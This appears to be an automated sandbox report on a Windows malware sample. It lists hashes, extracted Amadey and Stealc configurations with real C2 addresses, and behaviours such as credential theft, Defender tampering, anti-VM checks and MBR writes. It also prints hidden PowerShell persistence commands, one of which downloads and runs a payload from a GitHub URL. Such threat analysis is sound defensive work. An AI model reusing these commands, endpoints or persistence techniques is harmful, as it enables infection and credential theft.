Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
24/03/2025, 09:01
Static task
static1
Behavioral task
behavioral1
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Resource
win10v2004-20250314-en
General
-
Target
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
-
Size
938KB
-
MD5
278fa6cdc2189c33b3cf59614d6d9e7f
-
SHA1
f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
-
SHA256
86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
-
SHA512
76cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
-
SSDEEP
24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a0uu:eTvC/MTQYxsWR7a0u
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/6024-709-0x0000000000400000-0x0000000000867000-memory.dmp family_vidar_v7 behavioral2/memory/6024-20974-0x0000000000400000-0x0000000000867000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral2/memory/7160-53360-0x00000000007F0000-0x0000000000C32000-memory.dmp healer behavioral2/memory/7160-53361-0x00000000007F0000-0x0000000000C32000-memory.dmp healer -
Healer family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1836 created 2580 1836 Organizations.com 42 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ advnrNo.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE -
Blocklisted process makes network request 3 IoCs
flow pid Process 22 4584 powershell.exe 338 7312 powershell.exe 420 9460 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 4584 powershell.exe 7312 powershell.exe 9460 powershell.exe 4728 powershell.exe 11152 powershell.exe 8288 powershell.exe 8708 powershell.exe 9028 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 14 IoCs
flow pid Process 88 804 svchost.exe 134 4304 rapes.exe 568 10964 svchost.exe 65 4304 rapes.exe 538 4304 rapes.exe 30 4304 rapes.exe 30 4304 rapes.exe 223 4304 rapes.exe 223 4304 rapes.exe 223 4304 rapes.exe 22 4584 powershell.exe 107 4304 rapes.exe 338 7312 powershell.exe 420 9460 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\b5e51aa1.sys d91c7611.exe File created C:\Windows\System32\Drivers\klupd_b5e51aa1a_arkmon.sys d91c7611.exe File created C:\Windows\System32\Drivers\klupd_b5e51aa1a_klbg.sys d91c7611.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4688 takeown.exe 4904 icacls.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\V60vTp_2040\ImagePath = "\\??\\C:\\Windows\\Temp\\T076SXg_2040.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b5e51aa1\ImagePath = "System32\\Drivers\\b5e51aa1.sys" d91c7611.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_arkmon.sys" d91c7611.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klbg\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klbg.sys" d91c7611.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_klark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_klark.sys" d91c7611.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_mark\ImagePath = "System32\\Drivers\\klupd_b5e51aa1a_mark.sys" d91c7611.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b5e51aa1a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b5e51aa1a_arkmon.sys" d91c7611.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 380 chrome.exe 640 chrome.exe 5180 chrome.exe 4884 chrome.exe 5608 chrome.exe 13012 msedge.exe 6420 msedge.exe 6412 msedge.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion advnrNo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion advnrNo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation advnrNo.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation zx4PJh6.exe -
Deletes itself 1 IoCs
pid Process 1088 w32tm.exe -
Executes dropped EXE 22 IoCs
pid Process 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 4304 rapes.exe 2536 zx4PJh6.exe 1836 Organizations.com 6024 advnrNo.exe 824 OkH8IPF.exe 672 y0u3d_003.exe 4976 tK0oYx3.exe 2040 tzutil.exe 1088 w32tm.exe 1236 rapes.exe 7824 apple.exe 7968 11.exe 3356 11.exe 11192 3ff3734d.exe 12132 d91c7611.exe 9624 Jq0hGDZ.exe 3228 32ae679328.exe 8072 TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE 9880 483d2fa8a0d53818306efeb32d3.exe 10460 QL4t9UZ.exe 10824 laf6w_001.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine advnrNo.exe Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine rapes.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys d91c7611.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b5e51aa1.sys\ = "Driver" d91c7611.exe -
Loads dropped DLL 26 IoCs
pid Process 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe 12132 d91c7611.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4904 icacls.exe 4688 takeown.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 470 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10317340101\\Jq0hGDZ.exe\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32ae679328.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\32ae679328.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Start-Sleep -s 30; Start-Process 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe' -WindowStyle Hidden\"" QL4t9UZ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\df513079-9927-45c9-969d-fda124fb67ed = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{007ffd04-f795-4b5a-bf8e-373bfffa4394}\\df513079-9927-45c9-969d-fda124fb67ed.cmd\"" d91c7611.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe'\"" QL4t9UZ.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}" svchost.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\KasperskyLab d91c7611.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: d91c7611.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 517 pastebin.com 519 pastebin.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 d91c7611.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000800000002422a-21360.dat autoit_exe behavioral2/files/0x000300000002197d-53296.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 10936 tasklist.exe 13644 tasklist.exe 1780 tasklist.exe 1656 tasklist.exe 10548 tasklist.exe 10824 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 1580 Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE 4304 rapes.exe 6024 advnrNo.exe 1236 rapes.exe 8072 TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE 9880 483d2fa8a0d53818306efeb32d3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 824 set thread context of 4584 824 OkH8IPF.exe 131 PID 4976 set thread context of 4688 4976 tK0oYx3.exe 166 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 3ff3734d.exe File opened (read-only) \??\VBoxMiniRdrDN d91c7611.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\CylinderPair zx4PJh6.exe File created C:\Windows\Tasks\rapes.job Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE File opened for modification C:\Windows\NecessityInfections zx4PJh6.exe File opened for modification C:\Windows\VancouverPulse zx4PJh6.exe File opened for modification C:\Windows\GuaranteesFear zx4PJh6.exe File opened for modification C:\Windows\InvestingTr zx4PJh6.exe File opened for modification C:\Windows\OfficeForbes zx4PJh6.exe File opened for modification C:\Windows\SheDrum zx4PJh6.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 9168 sc.exe 9188 sc.exe 9332 sc.exe 9900 sc.exe 8376 sc.exe 1176 sc.exe 8944 sc.exe 9708 sc.exe 9816 sc.exe 10132 sc.exe 9376 sc.exe 9540 sc.exe 9932 sc.exe 10036 sc.exe 9568 sc.exe 1944 sc.exe 8460 sc.exe 4768 sc.exe 9684 sc.exe 5988 sc.exe 8784 sc.exe 9084 sc.exe 9424 sc.exe 9792 sc.exe 10000 sc.exe 10572 sc.exe 4764 sc.exe 4216 sc.exe 4316 sc.exe 8504 sc.exe 8712 sc.exe 8820 sc.exe 824 sc.exe 9256 sc.exe 9456 sc.exe 10200 sc.exe 8596 sc.exe 9040 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh d91c7611.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh d91c7611.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3592 1836 WerFault.exe 121 -
System Location Discovery: System Language Discovery 1 TTPs 51 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zx4PJh6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3ff3734d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language y0u3d_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp78HMRS7GNQ7DLADGLO4JDFNNFK2JWZ1A.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizations.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language advnrNo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32ae679328.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened 